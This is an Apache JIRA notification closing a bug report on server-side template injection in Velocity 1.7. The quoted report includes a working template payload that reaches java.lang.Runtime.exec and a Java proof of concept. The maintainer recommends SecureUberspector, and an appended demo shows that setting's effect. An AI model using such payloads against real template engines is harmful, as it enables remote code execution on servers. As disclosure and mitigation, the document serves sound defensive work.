[ https://issues.apache.org/jira/browse/VELOCITY-877?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ]
Sergiu Dumitriu closed VELOCITY-877.
------------------------------------
Resolution: Not A Problem
Assignee: Sergiu Dumitriu
Yes, this is by design, **if** you are using the default uberspector. Velocity
also comes with a secure uberspector, which is designed to prevent exactly this
kind of security issue.
{noformat}
runtime.introspector.uberspect = org.apache.velocity.util.introspection.SecureUberspector
{noformat}
> Access to critical fields/methods allows execution of arbitrary code
> ('Template Injection')
> -------------------------------------------------------------------------------------------
>
> Key: VELOCITY-877
> URL: https://issues.apache.org/jira/browse/VELOCITY-877
> Project: Velocity
> Issue Type: Bug
> Components: Engine
> Affects Versions: 1.7
> Reporter: Markus Wulftange
> Assignee: Sergiu Dumitriu
> Priority: Critical
> Labels: security
>
> It is possible to reference certain fields/methods, which eventually allow
> the execution of arbitrary methods.
> For example, by utilizing the '{{class}}' field or '{{getClass()}}' method of
> any variable, it is possible to get the variable's class object. This can be
> extended to get arbitrary class objects and execute arbitrary methods.
> For example, the following statement results in the execution of the
> '{{xterm}}':
> {code}
> $var.class.class.forName('java.lang.Runtime').getRuntime().exec('xterm').waitFor()
> {code}
> As a standalone:
> {code:java}
> import org.apache.velocity.VelocityContext;
> import org.apache.velocity.app.Velocity;
> import org.apache.velocity.context.Context;
>
> public class VelocityTest {
>     public static void main(String[] args) {
>         // any context variable will do; a plain String is enough
>         Context context = new VelocityContext();
>         context.put("var", "foo");
>         // the template text walks from the variable's class object to java.lang.Runtime
>         String instring =
>             "$var.class.class.forName('java.lang.Runtime').getRuntime().exec('xterm').waitFor()";
>         Velocity.evaluate(context, null, "templateName", instring);
>     }
> }
> {code}
> This issue has already been made public in the past by James Kettle in August
> 2015 (see
> http://blog.portswigger.net/2015/08/server-side-template-injection.html#Velocity)
> and via CVE-2015-5603 (see
> https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5603) and possibly
> others.
--
This message was sent by Atlassian JIRA (v6.3.4#6332)
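The closing comment above recommends switching the uberspector. The following is an added example, not code from the issue or from the Velocity project, showing the effect of that one property on a Velocity 1.7 engine: the same context variable is rendered once with the default uberspector and once with `SecureUberspector`. The probe template only reads the class name, which is the first step the report relies on; it does not call `Runtime`. The helper name `render` and the log tag `demo` are this example's own choices, and the expected outputs assume Velocity's default non-strict reference mode (an unresolved reference is rendered literally).

```java
import java.io.StringWriter;

import org.apache.velocity.VelocityContext;
import org.apache.velocity.app.VelocityEngine;
import org.apache.velocity.context.Context;

public class SecureUberspectorDemo {

    // Hypothetical helper: evaluate TEMPLATE on a fresh engine.
    // uberspectorClass == null keeps Velocity's default uberspector.
    static String render(String uberspectorClass, String template) {
        VelocityEngine engine = new VelocityEngine();
        if (uberspectorClass != null) {
            // Same property key the closing comment gives; set it before init().
            engine.setProperty("runtime.introspector.uberspect", uberspectorClass);
        }
        engine.init();

        // Constructed sample context, mirroring the report's "var" = "foo".
        Context context = new VelocityContext();
        context.put("var", "foo");

        StringWriter out = new StringWriter();
        engine.evaluate(context, out, "demo", template);
        return out.toString();
    }

    public static void main(String[] args) {
        // Harmless probe: can a template reach the class object of a plain String?
        String probe = "$var.class.name";

        System.out.println("default uberspector: " + render(null, probe));

        System.out.println("SecureUberspector:   " + render(
            "org.apache.velocity.util.introspection.SecureUberspector", probe));
    }
}
```

With the default uberspector the first line prints `java.lang.String`, because `$var.class` resolves to `getClass()` and from there the chain in the report is open. With `SecureUberspector` the `getClass` lookup is refused, the reference is left unresolved and the second line prints the template text `$var.class.name` unchanged; Velocity also logs the refused lookup, which is worth forwarding to wherever application logs are monitored, since a refused `getClass`/`forName` lookup in a template is a strong signal that someone is probing for this injection.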